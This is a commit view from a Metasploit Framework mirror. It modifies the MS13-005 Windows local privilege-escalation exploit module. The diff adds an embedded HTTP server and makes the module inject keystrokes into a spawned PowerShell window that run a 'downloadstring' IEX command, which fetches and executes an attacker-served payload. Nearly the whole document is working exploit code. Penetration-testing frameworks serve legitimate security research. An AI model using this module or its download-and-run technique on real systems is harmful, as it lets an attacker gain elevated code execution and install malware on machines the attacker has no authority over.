infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Working with psh download

bug/bundler_fix
Meatballs 2013-07-26 02:29:55 +01:00
parent b99ad41a64
commit d3f3e5d63e
1 changed files with 30 additions and 22 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

52
modules/exploits/windows/local/ms13_005.rb
View File

@ -13,6 +13,7 @@ class Metasploit3 < Msf::Exploit::Local
Rank = ExcellentRanking Rank = ExcellentRanking
include Msf::Exploit::EXE include Msf::Exploit::EXE
include Msf::Exploit::Remote::HttpServer
def initialize(info={}) def initialize(info={})
super( update_info( info, super( update_info( info,
@ -39,7 +40,7 @@ class Metasploit3 < Msf::Exploit::Local
], ],
'Platform' => [ 'win' ], 'Platform' => [ 'win' ],
'SessionTypes' => [ 'meterpreter' ], 'SessionTypes' => [ 'meterpreter' ],
'Targets' => 'Targets' =>
[ [
[ 'Windows x86', { 'Arch' => ARCH_X86 } ], [ 'Windows x86', { 'Arch' => ARCH_X86 } ],
[ 'Windows x64', { 'Arch' => ARCH_X86_64 } ] [ 'Windows x64', { 'Arch' => ARCH_X86_64 } ]
@ -60,7 +61,7 @@ class Metasploit3 < Msf::Exploit::Local
OptBool.new('SPAWN_PROMPT', [true, 'Attempts to spawn a medium integrity command prompt', true]) OptBool.new('SPAWN_PROMPT', [true, 'Attempts to spawn a medium integrity command prompt', true])
], self.class ], self.class
) )
register_advanced_options( register_advanced_options(
[ [
OptBool.new('EEGG', [false, '',]) OptBool.new('EEGG', [false, '',])
@ -70,38 +71,36 @@ class Metasploit3 < Msf::Exploit::Local
def win_shift(number) def win_shift(number)
vk = 0x30 + number vk = 0x30 + number
bscan = 0x81 + number bscan = 0x81 + number
client.railgun.user32.keybd_event('VK_LWIN', 0x5b, 0, 0) client.railgun.user32.keybd_event('VK_LWIN', 0x5b, 0, 0)
client.railgun.user32.keybd_event('VK_LSHIFT', 0xAA, 0, 0) client.railgun.user32.keybd_event('VK_LSHIFT', 0xAA, 0, 0)
sleep(0.01)
client.railgun.user32.keybd_event(vk, bscan, 0, 0) client.railgun.user32.keybd_event(vk, bscan, 0, 0)
sleep(0.01)
client.railgun.user32.keybd_event(vk, bscan, 'KEYEVENTF_KEYUP', 0) client.railgun.user32.keybd_event(vk, bscan, 'KEYEVENTF_KEYUP', 0)
client.railgun.user32.keybd_event('VK_LWIN', 0x5b, 'KEYEVENTF_KEYUP', 0) client.railgun.user32.keybd_event('VK_LWIN', 0x5b, 'KEYEVENTF_KEYUP', 0)
client.railgun.user32.keybd_event('VK_LSHIFT', 0xAA, 'KEYEVENTF_KEYUP', 0) client.railgun.user32.keybd_event('VK_LSHIFT', 0xAA, 'KEYEVENTF_KEYUP', 0)
end end
def count_cmd_procs def count_cmd_procs
count = 0 count = 0
client.sys.process.each_process do |proc| client.sys.process.each_process do |proc|
if proc['name'] == 'cmd.exe' if proc['name'] == 'powershell.exe'
count += 1 count += 1
end end
end end
vprint_status("Cmd prompt count: #{count}") vprint_status("Cmd prompt count: #{count}")
return count return count
end end
def cleanup def cleanup
if datastore['SPAWN_PROMPT'] if datastore['SPAWN_PROMPT']
vprint_status("Rehiding window...") vprint_status("Rehiding window...")
client.railgun.user32.ShowWindow(@hwin, 0) #client.railgun.user32.ShowWindow(@hwin, 0)
end end
end end
def exploit def primer
start_service
# syinfo is only on meterpreter sessions # syinfo is only on meterpreter sessions
e = "V2FrZSB1cCwgTmVvLi4uDQpUaGUgTWF0cml4IGhhcyB5b3UuLi4NCkZvbGxv\ndyB0aGUgV2hpdGUgUmFiYml0Lg==" e = "V2FrZSB1cCwgTmVvLi4uDQpUaGUgTWF0cml4IGhhcyB5b3UuLi4NCkZvbGxv\ndyB0aGUgV2hpdGUgUmFiYml0Lg=="
print_status("Running module against #{sysinfo['Computer']}") if not sysinfo.nil? print_status("Running module against #{sysinfo['Computer']}") if not sysinfo.nil?
@ -111,14 +110,14 @@ class Metasploit3 < Msf::Exploit::Local
if @hwin == nil if @hwin == nil
@hwin = client.railgun.user32.GetForegroundWindow()['return'] @hwin = client.railgun.user32.GetForegroundWindow()['return']
end end
#client.railgun.user32.ShowWindow(@hwin, 0) client.railgun.user32.ShowWindow(@hwin, 0)
#client.railgun.user32.ShowWindow(@hwin, 5) client.railgun.user32.ShowWindow(@hwin, 5)
# Spawn low integrity cmd.exe # Spawn low integrity cmd.exe
print_status("Spawning Low Integrity Cmd Prompt") print_status("Spawning Low Integrity Cmd Prompt")
windir = client.fs.file.expand_path("%windir%") windir = client.fs.file.expand_path("%windir%")
li_cmd_pid = client.sys.process.execute("#{windir}\\system32\\cmd.exe", nil, {'Hidden' => false }).pid li_cmd_pid = client.sys.process.execute("powershell.exe", nil, {'Hidden' => false }).pid
count = count_cmd_procs count = count_cmd_procs
spawned = false spawned = false
# Bruteforce taskbar position Win+Shift+? # Bruteforce taskbar position Win+Shift+?
@ -139,17 +138,26 @@ class Metasploit3 < Msf::Exploit::Local
fail_with(Exploit::Failure::Unknown, "No Cmd Prompt spawned") unless spawned fail_with(Exploit::Failure::Unknown, "No Cmd Prompt spawned") unless spawned
end end
print_status("Broadcasting payload command to prompt... I hope the user is asleep!") print_status("Broadcasting payload command to prompt... I hope the user is asleep!")
payload = Rex::Text.decode_base64(e) if datastore['EEGG'] data = Msf::Util::EXE.to_win32pe_psh_net(framework, payload.encoded)
payload.each_char do |c| url = get_uri()
print c download_and_run = "IEX ((new-object net.webclient).downloadstring('#{url}'))"
command = download_and_run
command = Rex::Text.decode_base64(e) if datastore['EEGG']
command.each_char do |c|
print c if command.length < 200
client.railgun.user32.SendMessageA('HWND_BROADCAST', 'WM_CHAR', c.unpack('c').first, 0) client.railgun.user32.SendMessageA('HWND_BROADCAST', 'WM_CHAR', c.unpack('c').first, 0)
sleep(0.01)
end end
print_line print_line
print_status("Executing command...") print_status("Executing command...")
client.railgun.user32.SendMessageA('HWND_BROADCAST', 'WM_CHAR', 'VK_RETURN', 0) client.railgun.user32.SendMessageA('HWND_BROADCAST', 'WM_CHAR', 'VK_RETURN', 0)
end end
def on_request_uri(cli, request)
print_status("Delivering Payload")
data = Msf::Util::EXE.to_win32pe_psh_net(framework, payload.encoded)
send_response(cli, data, { 'Content-Type' => 'application/octet-stream' })
end
end end